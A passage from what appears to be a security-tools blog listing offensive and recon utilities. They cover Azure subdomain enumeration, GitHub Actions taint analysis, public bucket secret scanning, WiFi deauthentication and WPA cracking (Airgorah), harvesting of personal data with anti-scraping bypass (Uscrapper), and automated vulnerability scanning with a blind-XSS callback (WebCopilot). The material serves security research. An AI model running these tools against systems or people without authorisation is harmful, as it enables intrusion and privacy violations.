Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains:

Enter the path of the file containing domains

    Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

    example.com
    subdomain.example.com
    anotherdomain.com

RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.


    Disclaimer

    This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.



    AzSubEnum - Azure Service Subdomain Enumeration

    By: Zion3R


    AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.


    How it works?

    AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

    With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
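
The underlying idea can be sketched in a few lines of Python: permute the base name against known Azure service suffixes and keep the names that resolve in DNS. The suffix list below is illustrative and far smaller than what AzSubEnum actually covers:

import socket

# Minimal sketch: permute a base name against a few Azure service suffixes and
# keep the names that resolve in DNS. The suffix list is illustrative only.
SUFFIXES = {
    "App Services": "azurewebsites.net",
    "Storage Accounts": "blob.core.windows.net",
    "Key Vaults": "vault.azure.net",
    "Databases (MSSQL)": "database.windows.net",
}

def enumerate_subdomains(base: str):
    for service, suffix in SUFFIXES.items():
        fqdn = f"{base}.{suffix}"
        try:
            socket.gethostbyname(fqdn)
        except socket.gaierror:
            continue
        yield service, fqdn

for service, fqdn in enumerate_subdomains("retailcorp"):
    print(f"{service}: {fqdn}")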


Why did I create this?

    During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.


    Usage
    ➜  AzSubEnum git:(main) βœ— python3 azsubenum.py --help
    usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

    Azure Subdomain Enumeration

    options:
    -h, --help show this help message and exit
    -b BASE, --base BASE Base name to use
    -v, --verbose Show verbose output
    -t THREADS, --threads THREADS
    Number of threads for concurrent execution
    -p PERMUTATIONS, --permutations PERMUTATIONS
    File containing permutations

    Basic enumeration:

    python3 azsubenum.py -b retailcorp --thread 10

    Using permutation wordlists:

    python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt

    With verbose output:

    python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose




    Argus - A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions

    By: Zion3R

    This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.

    Visit our website - secureci.org for more information.


    Features

    • Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.

    • Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.

    Usage

    This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.

    python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]

    Parameters:

    • --mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
    • --url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
    • --output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
    • --config: The config file. This parameter is optional.
    • --verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
    • --branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
    • --action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
    • --workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.

    Example:

    To use this script to interact with a GitHub repo, you might run a command like the following:

    python argus.py --mode repo --url https://github.com/username/repo.git --branch master

    This would run the script in repo mode on the master branch of the specified repository.

    How to use

    Argus can be run inside a docker container. To do so, follow the steps:

    • Install docker and docker-compose
      • apt-get -y install docker.io docker-compose
    • Clone the release branch of this repo
      • git clone <>
    • Build the docker container
      • docker-compose build
    • Now you can run argus. Example run:
      • docker-compose run argus --mode {mode} --url {url to target repo}
    • Results will be available inside the results folder

    Viewing SARIF Results

    You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.

    1. Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.

    2. VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.

    Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.

    Troubleshooting

    If there is an issue with needing the Github authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.

    Contributions

    Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!

    Cite Argus

    If you use Argus in your research, please cite our paper:

@inproceedings{muralee2023Argus,
  title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
  author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck, A. Kapravelos, A. Machiry},
  booktitle={32nd USENIX Security Symposium (USENIX Security 23)},
  year={2023},
}


    BucketLoot - An Automated S3-compatible Bucket Inspector

    By: Zion3R


    BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

    The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries that the user would like to scan, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.
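
As a hedged illustration of the unauthenticated listing this guest mode relies on, the Python sketch below fetches a bucket's ListBucketResult XML and prints the object keys (a single listing returns at most 1000 entries). The bucket URL is a placeholder, and BucketLoot's own implementation differs:

import requests
import xml.etree.ElementTree as ET

# Minimal sketch: fetch a public bucket listing and print object keys from the
# ListBucketResult XML (a single listing returns at most 1000 entries).
def list_keys(bucket_url: str):
    resp = requests.get(bucket_url, timeout=10)
    resp.raise_for_status()
    root = ET.fromstring(resp.content)
    # S3-style listings namespace their elements, so match on the local tag name.
    for element in root.iter():
        if element.tag.endswith("Key"):
            yield element.text

for key in list_keys("https://example-bucket.s3.amazonaws.com/"):
    print(key)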

    Features

    Secret Scanning

Scans for 80+ unique RegEx signatures that can help in uncovering secret exposures, tagged with their severity, from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!
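
To illustrate the signature-based approach, here is a minimal Python sketch that scans plain-text content against a few simplified patterns; these are examples only, not the signatures shipped in regexes.json:

import re

# Minimal sketch: scan plain-text content against a few simplified signatures.
# These patterns are illustrative; the real signatures live in regexes.json.
SIGNATURES = {
    "AWS Access Key ID": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Google API Key": re.compile(r"AIza[0-9A-Za-z_\-]{35}"),
    "Private Key Block": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}

def scan(text: str):
    for name, pattern in SIGNATURES.items():
        for match in pattern.finditer(text):
            yield name, match.group(0)

sample = "aws_access_key_id = AKIAIOSFODNN7EXAMPLE"
for name, value in scan(sample):
    print(f"[{name}] {value}")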

    Sensitive File Checks

    Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with an 80+ unique RegEx signature list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

    Dig Mode

    Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

    Asset Extraction

    Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

    Searching

    The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

    To know more about our Attack Surface Management platform, check out NVADR.



    Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

    By: Zion3R


    Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

    It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

    ⭐ Don't forget to put a star if you like the project!

    Legal

    Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

    Requirements

    This software only works on linux and requires root privileges to run.

    You will also need a wireless network card that supports monitor mode and packet injection.

    Installation

    The installation instructions are available here.

    Usage

    The documentation about the usage of the application is available here.

    License

    This project is released under MIT license.

    Contributing

    If you have any question about the usage of the application, do not hesitate to open a discussion

    If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request



    Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

    By: Zion3R


    Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and supports multithreading to make the process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
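    As a rough illustration of the kind of pattern matching involved (not Uscrapper's actual expressions), a single email regex applied to a saved page might look like this; page.html is a placeholder file:

      grep -Eo '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' page.html | sort -u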


    Extracted Details:

    Uscrapper extracts the following details from the provided website:

    • Email Addresses: Displays email addresses found on the website.
    • Social Media Links: Displays links to various social media platforms found on the website.
    • Author Names: Displays the names of authors associated with the website.
    • Geolocations: Displays geolocation information associated with the website.
    • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers and usernames.

    What's New?:

    Uscrapper 2.0:

    • Introduced multiple modules to bypass anti-web-scraping techniques.
    • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape websites from within.
    • Implemented Multithreading to make these processes faster.

    Installation Steps:

    git clone https://github.com/z0m31en7/Uscrapper.git
    cd Uscrapper/install/ 
    chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

    Usage:

    To run Uscrapper, use the following command-line syntax:

    python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


    Arguments:

    • -h, --help: Show the help message and exit.
    • -u URL, --url URL: Specify the URL of the website to extract details from.
    • -c INT, --crawl INT: Specify the number of links to crawl
    • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
    • -O, --generate-report: Generate a report file containing the extracted details.
    • -ns, --nonstrict: Display non-strict usernames during extraction.
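    For example, combining the arguments above to crawl 10 links of a target with 4 threads, include non-strict usernames, and write a report (the URL and values here are illustrative only):

      python Uscrapper-v2.0.py -u https://example.com -c 10 -t 4 -O -ns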

    Note:

    • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

    • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

    • To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.

    Contribution:

    Want a new feature to be added?

    • Make a pull request with all the necessary details and it will be merged after a review.
    • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


    WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

    By: Zion3R


    WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

    The script first enumerates all the subdomains of the given target domain using assetfinder, sublist3r, subfinder, amass, findomain, hackertarget, riddler and crt, then performs active subdomain enumeration using gobuster with a SecLists wordlist. It filters out the live subdomains using dnsx, extracts their titles using httpx, and scans for subdomain takeover using subjack. It then uses gauplus & waybackurls to crawl all the endpoints of those subdomains, applies gf patterns to filter out xss, lfi, ssrf, sqli, open redirect & rce parameters, and scans for vulnerabilities using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Finally, it prints the results of the scan and saves all the output in a specified directory.
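    Stripped down to a handful of the listed tools, the same idea looks roughly like the manual sketch below. This is not the script itself, and exact flags may differ between tool versions; example.com is a placeholder:

      subfinder -d example.com -silent | dnsx -silent | httpx -silent > alive.txt
      cat alive.txt | gauplus | gf xss | dalfox pipe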


    Features

    Usage

    g!2m0:~ webcopilot -h
                 
    ──────▄▀▄─────▄▀▄
    β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
    β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
    β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
    β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
    β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β• β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘β–‘β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
    [●] @h4r5h1t.hrs | G!2m0

    Usage:
    webcopilot -d <target>
    webcopilot -d <target> -s
    webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

    Flags:
    -d Add your target [Required]
    -o To save outputs in folder [Default: domain.com]
    -t Number of threads [Default: 100]
    -b Add your server for BXSS [Default: False]
    -x Exclude out of scope domains [Default: False]
    -s Run only Subdomain Enumeration [Default: False]
    -h Show this help message

    Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
    Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

    Installing WebCopilot

    WebCopilot requires git to install successfully. Run the following command as root to install webcopilot

    git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

    Tools Used:

    SubFinder β€’ Sublist3r β€’ Findomain β€’ gf β€’ OpenRedireX β€’ dnsx β€’ sqlmap β€’ gobuster β€’ assetfinder β€’ httpx β€’ kxss β€’ qsreplace β€’ Nuclei β€’ dalfox β€’ anew β€’ jq β€’ aquatone β€’ urldedupe β€’ Amass β€’ gauplus β€’ waybackurls β€’ crlfuzz

    Running WebCopilot

    To run the tool on a target, just use the following command.

    g!2m0:~ webcopilot -d bugcrowd.com

    The -o command can be used to specify an output dir.

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

    The -s command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

    The -t command can be used to add threads to your scan for faster results.

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

    The -b command can be used for blind xss (OOB), you can get your server from xsshunter or interact

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

    The -x command can be used to exclude out of scope domains.

    g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

    Example

    Default options looks like this:

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd
                                    ──────▄▀▄─────▄▀▄
    β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
    β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
    β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
    β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
    β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆ β–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘ β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
    β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘ β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
    [●] @h4r5h1t.hrs | G!2m0


    [❌] Warning: Use with caution. You are responsible for your own actions.
    [❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.


    Target: bugcrowd.com
    Output: /home/gizmo/targets/bugcrowd
    Threads: 100
    Server: False
    Exclude: False
    Mode: Running all Enumeration
    Time: 30-08-2021 15:10:00

    [!] Please wait while scanning...

    [●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
    [●] Subdoamin Scanned - [assetfinderβœ”] Subdomain Found: 34
    [●] Subdoamin Scanned - [sublist3rβœ”] Subdomain Found: 29
    [●] Subdoamin Scanned - [subfinderβœ”] Subdomain Found: 54
    [●] Subdoamin Scanned - [amassβœ”] Subdomain Found: 43
    [●] Subdoamin Scanned - [findomainβœ”] Subdomain Found: 27

    [●] Active Subdoamin Scanning is in progress:
    [!] Please be patient. This may take a while...
    [●] Active Subdoamin Scanned - [gobusterβœ”] Subdomain Found: 11
    [●] Active Subdoamin Scanned - [amassβœ”] Subdomain Found: 0

    [●] Subdomain Scanning: Filtering out of scope subdomains
    [●] Subdomain Scanning: Filtering Alive subdomains
    [●] Subdomain Scanning: Getting titles of valid subdomains
    [●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/

    [●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

    [●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
    [●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
    [●] Vulnerabilities Scanned - [XSSβœ”] Found: 0
    [●] Vulnerabilities Scanned - [SQLiβœ”] Found: 0
    [●] Vulnerabilities Scanned - [LFIβœ”] Found: 0
    [●] Vulnerabilities Scanned - [CRLFβœ”] Found: 0
    [●] Vulnerabilities Scanned - [SSRFβœ”] Found: 0
    [●] Vulnerabilities Scanned - [Sensitive Dataβœ”] Found: 0
    [●] Vulnerabilities Scanned - [Open redirectβœ”] Found: 0
    [●] Vulnerabilities Scanned - [Subdomain Takeoverβœ”] Found: 0
    [●] Vulnerabilities Scanned - [Nuclieβœ”] Found: 0
    [●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


    β–’β–ˆβ–€β–€β–ˆ β–ˆβ–€β–€ β–ˆβ–€β–€ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–€β–€β–ˆβ–€β–€
    β–’β–ˆβ–„β–„β–€ β–ˆβ–€β–€ β–€β–€β–ˆ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–‘β–‘β–ˆβ–‘β–‘
    β–’β–ˆβ–‘β–’β–ˆ β–€β–€β–€ β–€β–€β–€ β–‘β–€β–€β–€ β–€β–€β–€ β–‘β–‘β–€β–‘β–‘

    [+] Subdomains of bugcrowd.com
    [+] Subdomains Found: 0
    [+] Subdomains Alive: 0
    [+] Endpoints: 11032
    [+] XSS: 0
    [+] SQLi: 0
    [+] Open Redirect: 0
    [+] SSRF: 0
    [+] CRLF: 0
    [+] LFI: 0
    [+] Sensitive Data: 0
    [+] Subdomain Takeover: 0
    [+] Nuclei: 0

    Acknowledgement

    WebCopilot is inspired from Garud & Pinaak by ROX4R.

    Thanks to the authors of the tools & wordlists used in this script.

    @aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

    Warning: Developers assume no liability and are not responsible for any misuse or damage caused by this tool. So, please use with caution because you are responsible for your own actions.


    Legba - A Multiprotocol Credentials Bruteforcer / Password Sprayer And Enumerator

    By: Zion3R


